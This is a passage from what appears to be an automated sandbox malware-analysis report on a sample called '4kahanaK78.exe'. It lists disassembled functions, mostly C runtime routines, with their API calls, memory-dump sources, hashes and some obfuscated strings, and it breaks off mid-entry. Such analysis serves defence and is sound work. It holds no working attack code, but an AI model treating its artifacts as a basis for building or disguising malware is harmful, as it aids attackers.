                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction ID: d8cf10429ad78adbbf649e9e716cdc821bb75004371922dd5f56d618f8819c6d
                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction Fuzzy Hash: DD01D4323092119FA7342F77BC859772B56EB056B9730023AE914650E1FF1B7D126154
                                    Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                    • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                      • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                    • ___initconout.LIBCMT ref: 1000CD55
                                      • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                    • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                    • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                    • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                    Function 04B5B089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000), ref: 04B5B0A0
                                    • GetLastError.KERNEL32(?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000,?,04B58863,?), ref: 04B5B0AC
                                      • Part of subcall function 04B5B072: CloseHandle.KERNEL32(0042A930,04B5B0BC,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000), ref: 04B5B082
                                    • ___initconout.LIBCMT ref: 04B5B0BC
                                      • Part of subcall function 04B5B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B5B063,04B5AD23,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B047
                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B0D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                    • Instruction ID: 54ca15ac29abb2cc356db3baf26df87052cd03596aeb9704bf31b045e8cf73b7
                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                    • Instruction Fuzzy Hash: EFF03036901114BFCF226FA1DC08ADDBF26FF086A4F094460FE1E96130C632A961DB95
                                    Function 0041AE22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                    • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                      • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                    • ___initconout.LIBCMT ref: 0041AE55
                                      • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                    • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                    • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                    Function 004091F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                    • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                    • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                    • String ID:
                                    • API String ID: 3269011525-0
                                    • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                    • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                    • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                    • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                    Function 04CEFE46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                    • Instruction ID: a52cc2ab89454d24c6d9fecf1b2cf4ea9ab31382e6dc5c5c8b4052db5e01ed63
                                    • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                    • Instruction Fuzzy Hash: 81E0EC71B133209A96726F15BD4044AFF62EBD4F143C5803AE54012332C77A2953EBCE
                                    Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 100067F1
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 10006804
                                    • _free.LIBCMT ref: 10006815
                                    • _free.LIBCMT ref: 10006826
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                    • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                    • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                    • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                    Function 04B50CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 04B50CB6
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B50CC9
                                    • _free.LIBCMT ref: 04B50CDA
                                    • _free.LIBCMT ref: 04B50CEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                    • Instruction ID: 2a638163b3dbc4a5c9aadf3cbc1385501b8d40215370a85339a438bd3f7c2bfd
                                    • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                    • Instruction Fuzzy Hash: 52E0EC79E13334AAD6366F18BD40649FF69EBD8B143C50076E83012270C7322553ABCE
                                    Function 00410A46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00410A4F
                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 00410A62
                                    • _free.LIBCMT ref: 00410A73
                                    • _free.LIBCMT ref: 00410A84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                    • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                    • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                    • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                    Function 0040F8ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                    • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                    • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                    • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                    Function 10006038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                    • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                    • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                    • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                    Function 04B503E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                    • Instruction ID: a738876d3c2ff8ac166625f641da9be7d3e0f88f925c14354a04c58037eea498
                                    • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                    • Instruction Fuzzy Hash: 6D416671A00218AFDB21EF9DDC81AAEFBB8EFC5314B5000A6E805D7261E770AA41DB54
                                    Function 0041017D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                    • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                    • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                    • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                    Function 04B4AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 04B4AE86
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 04B4AF3A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 3480331319-1018135373
                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction ID: d8fea0a21baf093387e28021d95f836c02d33f5530b8aa594742145cc105e3b7
                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                    • Instruction Fuzzy Hash: CA41C470A40218ABCF10DF68C884A9EBFB4EF89318F1485D5EC18AB351D735FA15DBA1
                                    Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                    • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                    • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                    • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                    Function 04B4B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlEncodePointer.NTDLL(00000000), ref: 04B4B711
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                    • Instruction ID: 923960378f10a42f4d89f9f1eca47e0f2ee5ca5c2c0ddb50a050844d7370f4e8
                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                    • Instruction Fuzzy Hash: 53415871900209AFDF15CF98C881AEEBBB5FF88314F158099FA15A7211D335F950EB50
                                    Function 0040B485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 2118026453-2084237596
                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                    • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                    • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                    Function 04CE0730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE07BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: FEKN$NE]D
                                    • API String ID: 1385522511-517842756
                                    • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                    • Instruction ID: af7ab7e38aa52ae6639d52fbd05c6275cdb13fcaddd4cc79a55e08244c84fa41
                                    • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                    • Instruction Fuzzy Hash: BA214830B00645CFE720DF2AE845BB937A1FB85308F944269D8541B262EBB53686CBD9
                                    Function 04B41597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B41622
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: FEKN$NE]D
                                    • API String ID: 4132704954-517842756
                                    • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                    • Instruction ID: c6b6ce85a24c3fb136392ac9d6bd6c39d7965e59de907ef64728266f1d67071b
                                    • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                    • Instruction Fuzzy Hash: D3214870B00245CBEB20DF38E849BA977A0EFD5308F9442A9D8141B261EBB57586D7CE
                                    Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 004013BB
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: FEKN$NE]D
                                    • API String ID: 2296764815-517842756
                                    • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                    • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                    • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                    • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                    Function 04CE70C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE712E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 1385522511-3597986494
                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                    • Instruction ID: bd85f991c3c89342e3b2ffa70d6ccece1921f61571a2437b702845afdfd88886
                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                    • Instruction Fuzzy Hash: 25012130F01304ABC720FF6AAC009B8B3B5FB88304F880279D41857240EB75A9429BEA
                                    Function 04CE6B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE6B6E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CD^O$_DC[
